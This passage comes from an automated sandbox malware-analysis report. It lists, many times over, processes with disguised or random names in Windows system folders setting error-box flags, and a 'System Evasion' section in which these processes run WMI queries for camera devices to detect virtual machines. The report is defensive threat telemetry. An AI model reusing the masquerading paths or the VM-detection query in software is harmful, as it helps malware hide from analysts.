                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                    Source: C:\Windows\GameBarPresenceWriter\services.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
